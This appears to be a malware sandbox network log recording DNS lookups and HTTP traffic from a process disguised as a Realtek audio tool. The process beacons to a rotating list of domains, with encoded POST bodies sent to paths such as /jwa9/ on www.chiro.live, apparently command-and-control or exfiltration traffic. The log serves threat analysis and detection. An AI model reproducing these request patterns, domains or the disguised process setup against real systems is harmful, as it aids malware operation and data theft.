Jan 9, 2025 08:30:21.923636913 CET	57767	53	192.168.11.20	9.9.9.9
Jan 9, 2025 08:30:22.144779921 CET	53	57767	9.9.9.9	192.168.11.20
Jan 9, 2025 08:30:35.467653036 CET	54461	53	192.168.11.20	9.9.9.9
Jan 9, 2025 08:30:35.804177999 CET	53	54461	9.9.9.9	192.168.11.20
Jan 9, 2025 08:30:49.417526960 CET	59967	53	192.168.11.20	9.9.9.9
Jan 9, 2025 08:30:49.601869106 CET	53	59967	9.9.9.9	192.168.11.20
Jan 9, 2025 08:31:03.085748911 CET	49912	53	192.168.11.20	9.9.9.9
Jan 9, 2025 08:31:03.282037973 CET	53	49912	9.9.9.9	192.168.11.20
Jan 9, 2025 08:31:11.335201979 CET	50998	53	192.168.11.20	9.9.9.9
Jan 9, 2025 08:31:11.548532963 CET	53	50998	9.9.9.9	192.168.11.20
Jan 9, 2025 08:31:26.393703938 CET	64543	53	192.168.11.20	9.9.9.9
Jan 9, 2025 08:31:26.579826117 CET	53	64543	9.9.9.9	192.168.11.20
Jan 9, 2025 08:31:39.890944004 CET	53688	53	192.168.11.20	9.9.9.9
Jan 9, 2025 08:31:40.534472942 CET	53	53688	9.9.9.9	192.168.11.20
Jan 9, 2025 08:31:54.903208971 CET	60508	53	192.168.11.20	9.9.9.9
Jan 9, 2025 08:31:55.049479961 CET	53	60508	9.9.9.9	192.168.11.20
Jan 9, 2025 08:32:08.258821964 CET	63497	53	192.168.11.20	9.9.9.9
Jan 9, 2025 08:32:08.380634069 CET	53	63497	9.9.9.9	192.168.11.20
Jan 9, 2025 08:32:16.429095984 CET	51011	53	192.168.11.20	9.9.9.9
Jan 9, 2025 08:32:17.443480015 CET	51011	53	192.168.11.20	1.1.1.1
Jan 9, 2025 08:32:18.458811045 CET	51011	53	192.168.11.20	9.9.9.9
Jan 9, 2025 08:32:18.641545057 CET	53	51011	9.9.9.9	192.168.11.20
Jan 9, 2025 08:32:32.378768921 CET	54143	53	192.168.11.20	9.9.9.9
Jan 9, 2025 08:32:32.727330923 CET	53	54143	9.9.9.9	192.168.11.20
Jan 9, 2025 08:32:47.063771963 CET	60248	53	192.168.11.20	9.9.9.9
Jan 9, 2025 08:32:47.257458925 CET	53	60248	9.9.9.9	192.168.11.20
Jan 9, 2025 08:33:00.559915066 CET	61296	53	192.168.11.20	9.9.9.9
Jan 9, 2025 08:33:00.734047890 CET	53	61296	9.9.9.9	192.168.11.20
Jan 9, 2025 08:33:14.291356087 CET	63658	53	192.168.11.20	9.9.9.9
Jan 9, 2025 08:33:14.462901115 CET	53	63658	9.9.9.9	192.168.11.20
Jan 9, 2025 08:33:27.898829937 CET	56741	53	192.168.11.20	9.9.9.9
Jan 9, 2025 08:33:28.018126965 CET	53	56741	9.9.9.9	192.168.11.20
Jan 9, 2025 08:34:25.056468964 CET	49704	53	192.168.11.20	9.9.9.9
Jan 9, 2025 08:34:26.071527004 CET	49704	53	192.168.11.20	1.1.1.1
Jan 9, 2025 08:34:27.086925030 CET	49704	53	192.168.11.20	9.9.9.9
Jan 9, 2025 08:34:27.206224918 CET	53	49704	9.9.9.9	192.168.11.20
Jan 9, 2025 08:34:30.243088007 CET	62570	53	192.168.11.20	9.9.9.9
Jan 9, 2025 08:34:30.362569094 CET	53	62570	9.9.9.9	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 9, 2025 08:30:05.139106989 CET	192.168.11.20	1.1.1.1	0xffe0	Standard query (0)	www.milp.store	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:06.144231081 CET	192.168.11.20	9.9.9.9	0xffe0	Standard query (0)	www.milp.store	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:21.923636913 CET	192.168.11.20	9.9.9.9	0xb778	Standard query (0)	www.chiro.live	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:35.467653036 CET	192.168.11.20	9.9.9.9	0xf698	Standard query (0)	www.mzkd6gp5.top	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:49.417526960 CET	192.168.11.20	9.9.9.9	0x587f	Standard query (0)	www.bokus.site	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:31:03.085748911 CET	192.168.11.20	9.9.9.9	0x222b	Standard query (0)	www.elettrocoltura.info	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:31:11.335201979 CET	192.168.11.20	9.9.9.9	0x67a5	Standard query (0)	www.givvjn.info	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:31:26.393703938 CET	192.168.11.20	9.9.9.9	0xe31c	Standard query (0)	www.bonheur.tech	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:31:39.890944004 CET	192.168.11.20	9.9.9.9	0xfab2	Standard query (0)	www.rpa.asia	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:31:54.903208971 CET	192.168.11.20	9.9.9.9	0x3367	Standard query (0)	www.ogbos88.cyou	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:32:08.258821964 CET	192.168.11.20	9.9.9.9	0x7c40	Standard query (0)	www.smartbath.shop	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:32:16.429095984 CET	192.168.11.20	9.9.9.9	0x3551	Standard query (0)	www.100millionjobs.africa	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:32:17.443480015 CET	192.168.11.20	1.1.1.1	0x3551	Standard query (0)	www.100millionjobs.africa	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:32:18.458811045 CET	192.168.11.20	9.9.9.9	0x3551	Standard query (0)	www.100millionjobs.africa	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:32:32.378768921 CET	192.168.11.20	9.9.9.9	0x4db4	Standard query (0)	www.mirenzhibo.net	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:32:47.063771963 CET	192.168.11.20	9.9.9.9	0x2f8f	Standard query (0)	www.nextlevel.finance	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:33:00.559915066 CET	192.168.11.20	9.9.9.9	0x2149	Standard query (0)	www.furrcali.xyz	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:33:14.291356087 CET	192.168.11.20	9.9.9.9	0x1353	Standard query (0)	www.buyspeechst.shop	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:33:27.898829937 CET	192.168.11.20	9.9.9.9	0xfda7	Standard query (0)	www.lejgnu.info	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:34:25.056468964 CET	192.168.11.20	9.9.9.9	0x9136	Standard query (0)	www.elettrocoltura.info	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:34:26.071527004 CET	192.168.11.20	1.1.1.1	0x9136	Standard query (0)	www.elettrocoltura.info	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:34:27.086925030 CET	192.168.11.20	9.9.9.9	0x9136	Standard query (0)	www.elettrocoltura.info	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:34:30.243088007 CET	192.168.11.20	9.9.9.9	0x7fc3	Standard query (0)	www.elettrocoltura.info	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 9, 2025 08:30:06.390722990 CET	9.9.9.9	192.168.11.20	0xffe0	No error (0)	www.milp.store		194.9.94.85	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:06.390722990 CET	9.9.9.9	192.168.11.20	0xffe0	No error (0)	www.milp.store		194.9.94.86	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:22.144779921 CET	9.9.9.9	192.168.11.20	0xb778	No error (0)	www.chiro.live		45.33.23.183	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:22.144779921 CET	9.9.9.9	192.168.11.20	0xb778	No error (0)	www.chiro.live		45.79.19.196	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:22.144779921 CET	9.9.9.9	192.168.11.20	0xb778	No error (0)	www.chiro.live		198.58.118.167	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:22.144779921 CET	9.9.9.9	192.168.11.20	0xb778	No error (0)	www.chiro.live		45.56.79.23	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:22.144779921 CET	9.9.9.9	192.168.11.20	0xb778	No error (0)	www.chiro.live		173.255.194.134	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:22.144779921 CET	9.9.9.9	192.168.11.20	0xb778	No error (0)	www.chiro.live		72.14.178.174	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:22.144779921 CET	9.9.9.9	192.168.11.20	0xb778	No error (0)	www.chiro.live		96.126.123.244	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:22.144779921 CET	9.9.9.9	192.168.11.20	0xb778	No error (0)	www.chiro.live		45.33.30.197	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:22.144779921 CET	9.9.9.9	192.168.11.20	0xb778	No error (0)	www.chiro.live		72.14.185.43	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:22.144779921 CET	9.9.9.9	192.168.11.20	0xb778	No error (0)	www.chiro.live		45.33.2.79	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:22.144779921 CET	9.9.9.9	192.168.11.20	0xb778	No error (0)	www.chiro.live		45.33.18.44	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:22.144779921 CET	9.9.9.9	192.168.11.20	0xb778	No error (0)	www.chiro.live		45.33.20.235	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:35.804177999 CET	9.9.9.9	192.168.11.20	0xf698	No error (0)	www.mzkd6gp5.top		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:35.804177999 CET	9.9.9.9	192.168.11.20	0xf698	No error (0)	www.mzkd6gp5.top		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:35.804177999 CET	9.9.9.9	192.168.11.20	0xf698	No error (0)	www.mzkd6gp5.top		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:35.804177999 CET	9.9.9.9	192.168.11.20	0xf698	No error (0)	www.mzkd6gp5.top		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:35.804177999 CET	9.9.9.9	192.168.11.20	0xf698	No error (0)	www.mzkd6gp5.top		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:35.804177999 CET	9.9.9.9	192.168.11.20	0xf698	No error (0)	www.mzkd6gp5.top		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:35.804177999 CET	9.9.9.9	192.168.11.20	0xf698	No error (0)	www.mzkd6gp5.top		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:30:49.601869106 CET	9.9.9.9	192.168.11.20	0x587f	No error (0)	www.bokus.site		199.192.21.169	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:31:03.282037973 CET	9.9.9.9	192.168.11.20	0x222b	Name error (3)	www.elettrocoltura.info	none	none	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:31:11.548532963 CET	9.9.9.9	192.168.11.20	0x67a5	No error (0)	www.givvjn.info		47.83.1.90	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:31:26.579826117 CET	9.9.9.9	192.168.11.20	0xe31c	No error (0)	www.bonheur.tech		13.248.169.48	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:31:26.579826117 CET	9.9.9.9	192.168.11.20	0xe31c	No error (0)	www.bonheur.tech		76.223.54.146	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:31:40.534472942 CET	9.9.9.9	192.168.11.20	0xfab2	No error (0)	www.rpa.asia		160.25.166.123	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:31:55.049479961 CET	9.9.9.9	192.168.11.20	0x3367	No error (0)	www.ogbos88.cyou		172.67.132.227	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:31:55.049479961 CET	9.9.9.9	192.168.11.20	0x3367	No error (0)	www.ogbos88.cyou		104.21.13.141	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:32:08.380634069 CET	9.9.9.9	192.168.11.20	0x7c40	Name error (3)	www.smartbath.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:32:18.641545057 CET	9.9.9.9	192.168.11.20	0x3551	No error (0)	www.100millionjobs.africa	100millionjobs.africa		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 08:32:18.641545057 CET	9.9.9.9	192.168.11.20	0x3551	No error (0)	100millionjobs.africa		136.243.64.147	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:32:32.727330923 CET	9.9.9.9	192.168.11.20	0x4db4	No error (0)	www.mirenzhibo.net		202.95.11.110	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:32:47.257458925 CET	9.9.9.9	192.168.11.20	0x2f8f	No error (0)	www.nextlevel.finance		76.223.54.146	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:32:47.257458925 CET	9.9.9.9	192.168.11.20	0x2f8f	No error (0)	www.nextlevel.finance		13.248.169.48	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:33:00.734047890 CET	9.9.9.9	192.168.11.20	0x2149	No error (0)	www.furrcali.xyz		103.106.67.112	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:33:14.462901115 CET	9.9.9.9	192.168.11.20	0x1353	No error (0)	www.buyspeechst.shop		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:33:14.462901115 CET	9.9.9.9	192.168.11.20	0x1353	No error (0)	www.buyspeechst.shop		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:33:14.462901115 CET	9.9.9.9	192.168.11.20	0x1353	No error (0)	www.buyspeechst.shop		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:33:14.462901115 CET	9.9.9.9	192.168.11.20	0x1353	No error (0)	www.buyspeechst.shop		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:33:14.462901115 CET	9.9.9.9	192.168.11.20	0x1353	No error (0)	www.buyspeechst.shop		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:33:14.462901115 CET	9.9.9.9	192.168.11.20	0x1353	No error (0)	www.buyspeechst.shop		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:33:14.462901115 CET	9.9.9.9	192.168.11.20	0x1353	No error (0)	www.buyspeechst.shop		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:33:28.018126965 CET	9.9.9.9	192.168.11.20	0xfda7	Name error (3)	www.lejgnu.info	none	none	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:34:27.206224918 CET	9.9.9.9	192.168.11.20	0x9136	Name error (3)	www.elettrocoltura.info	none	none	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:34:30.362569094 CET	9.9.9.9	192.168.11.20	0x7fc3	Name error (3)	www.elettrocoltura.info	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.milp.store

www.chiro.live

www.mzkd6gp5.top

www.bokus.site

www.givvjn.info

www.bonheur.tech

www.rpa.asia

www.ogbos88.cyou

www.100millionjobs.africa

www.mirenzhibo.net

www.nextlevel.finance

www.furrcali.xyz

www.buyspeechst.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49713	194.9.94.85	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:30:06.637901068 CET	538	OUT	GET /js1x/?cOnShP=YzadGC6YqOgjY/9qwmEESxfA+8MKCZxp0CcLO+Xh8dJmB8CdhvgUA7hRZF2xLQJtMCWb5Kgxi+xGIwqq0R102ShiT2rp0EsU7QKswMKkfsup8/2EYKLr6Ec=&NvA=qUwPQPTQmTwyizTU HTTP/1.1 Host: www.milp.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 08:30:06.881885052 CET	1289	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 09 Jan 2025 07:30:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.30 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jan 9, 2025 08:30:06.882102013 CET	1289	IN	Data Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61 Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
Jan 9, 2025 08:30:06.882180929 CET	1289	IN	Data Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68 Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
Jan 9, 2025 08:30:06.882354975 CET	1289	IN	Data Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
Jan 9, 2025 08:30:06.882385015 CET	661	IN	Data Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72 Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
Jan 9, 2025 08:30:06.882396936 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49714	45.33.23.183	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:30:22.292313099 CET	793	OUT	POST /jwa9/ HTTP/1.1 Host: www.chiro.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.chiro.live Referer: http://www.chiro.live/jwa9/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 62 31 62 57 4b 43 2f 49 59 6a 66 30 74 63 71 2f 61 71 46 51 5a 65 72 4a 55 45 2b 4d 72 70 30 61 7a 51 6d 75 45 61 6f 4c 2b 76 66 52 72 7a 69 56 36 5a 79 71 4b 70 58 61 2f 35 59 43 4f 6a 57 69 45 49 41 58 48 65 74 2b 58 4b 39 6d 49 63 6d 79 42 62 54 50 4f 52 34 78 58 52 2f 4f 66 30 38 4e 39 65 72 65 45 43 46 4a 79 61 6f 4d 51 48 78 52 6d 42 31 34 35 49 4d 6f 6e 4e 74 73 2b 6a 56 54 79 69 4f 61 43 63 45 4b 68 49 36 77 7a 64 34 78 57 49 34 33 32 56 4b 6e 4d 4d 30 6c 58 56 53 4a 6f 4a 51 5a 33 37 4c 6f 44 49 59 30 2f 43 6e 6b 43 57 72 52 43 67 3d 3d Data Ascii: cOnShP=qZs751u9hJjEb1bWKC/IYjf0tcq/aqFQZerJUE+Mrp0azQmuEaoL+vfRrziV6ZyqKpXa/5YCOjWiEIAXHet+XK9mIcmyBbTPOR4xXR/Of08N9ereECFJyaoMQHxRmB145IMonNts+jVTyiOaCcEKhI6wzd4xWI432VKnMM0lXVSJoJQZ37LoDIY0/CnkCWrRCg==
Jan 9, 2025 08:30:22.437994957 CET	806	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Thu, 09 Jan 2025 07:30:22 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 06 8c ed d8 6e 20 9d 84 fa b3 8e 9d 38 4e c0 be 64 84 a4 58 22 42 a2 20 c0 4e a7 ff bd 18 3a 31 1d f7 50 1d 90 76 d9 7d bb ef ad 64 7d f8 b6 70 56 eb bb 81 42 64 c8 ae ce ac c3 a6 30 c0 b7 b6 8a b9 7a 75 a6 14 cb 22 18 a0 ea 58 9a 21 96 40 81 04 c4 09 96 b6 fa b8 1a 36 7a 7f 22 8f bf 89 94 51 03 ff 48 69 66 ab bb 46 0a 1a 50 84 11 90 d4 67 58 55 a0 e0 12 f3 22 77 32 b0 31 da e2 93 6c 0e 42 6c ab 19 c5 79 24 62 59 4b c8 29 92 c4 46 38 a3 10 37 4a e3 b3 42 39 95 14 b0 46 02 01 c3 76 53 33 ea 70 92 4a 86 af 2c bd da 4b 3a 65 93 5c 24 30 a6 91 3c d2 fa 77 ef 31 7e 89 71 42 6a 2d 18 97 69 cc ec 03 bf 2f ba 9e e7 79 d7 d0 20 a1 b1 d0 18 cd b0 ae 2a fa 11 d2 d2 4f cb 58 a5 7a 75 79 4e 4b 74 fe af 84 a5 1f 07 63 f9 02 ed 15 c1 99 00 c8 56 91 78 ae 8e 1f 3f d5 c5 a8 28 2b 72 1f 15 ea 4a bc 93 7a 00 32 50 79 6b 71 07 25 5e 52 0e 25 15 5c a9 41 29 3f df f5 3b 84 1c 56 4e 39 12 b9 26 45 a4 31 01 8b f9 0a ae 91 82 90 62 2b [TRUNCATED] Data Ascii: 266SMs0WPvn 8NdX"B N:1Pv}d}pVBd0zu"X!@6z"QHifFPgXU"w21lBly$bYK)F87JB9FvS3pJ,K:e\$0<w1~qBj-i/y *OXzuyNKtcVx?(+rJz2Pykq%^R%\A)?;VN9&E1b+Q@A_<nmt{Ft{s!AMl6aJ^sMbLJO2H@ePk,E(\|GdpynI dx\|RM9A#ynr\|Q3Y[\u$1C.!<u@VpQq#&}ri_k:-K_uK?0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.11.20	49715	45.33.23.183	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:30:24.958570957 CET	813	OUT	POST /jwa9/ HTTP/1.1 Host: www.chiro.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.chiro.live Referer: http://www.chiro.live/jwa9/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 5a 58 50 57 4d 6c 6a 49 51 6a 66 33 6f 63 71 2f 44 36 46 63 5a 65 58 4a 55 41 4f 6d 73 66 6b 61 79 78 57 75 46 65 38 4c 35 76 66 52 6a 54 69 51 6e 4a 79 74 4b 70 4c 38 2f 34 30 43 4f 6e 32 69 45 4e 73 58 62 39 56 39 46 71 39 67 42 38 6d 30 46 62 54 50 4f 52 34 78 58 52 72 6f 66 30 6b 4e 38 75 62 65 47 6a 46 4b 2b 36 6f 54 48 33 78 52 77 78 31 38 35 49 4d 4b 6e 50 4a 4b 2b 67 74 54 79 6a 2b 61 43 4e 45 4a 36 59 36 79 75 4e 35 65 64 59 68 68 34 46 6d 77 4c 65 55 65 50 32 72 39 6b 2f 64 44 71 4a 2f 4d 41 62 45 47 37 79 65 4d 41 55 71 4b 66 72 59 73 44 71 70 43 36 4f 7a 4f 78 54 6f 31 7a 42 7a 78 53 6b 49 3d Data Ascii: cOnShP=qZs751u9hJjEZXPWMljIQjf3ocq/D6FcZeXJUAOmsfkayxWuFe8L5vfRjTiQnJytKpL8/40COn2iENsXb9V9Fq9gB8m0FbTPOR4xXRrof0kN8ubeGjFK+6oTH3xRwx185IMKnPJK+gtTyj+aCNEJ6Y6yuN5edYhh4FmwLeUeP2r9k/dDqJ/MAbEG7yeMAUqKfrYsDqpC6OzOxTo1zBzxSkI=
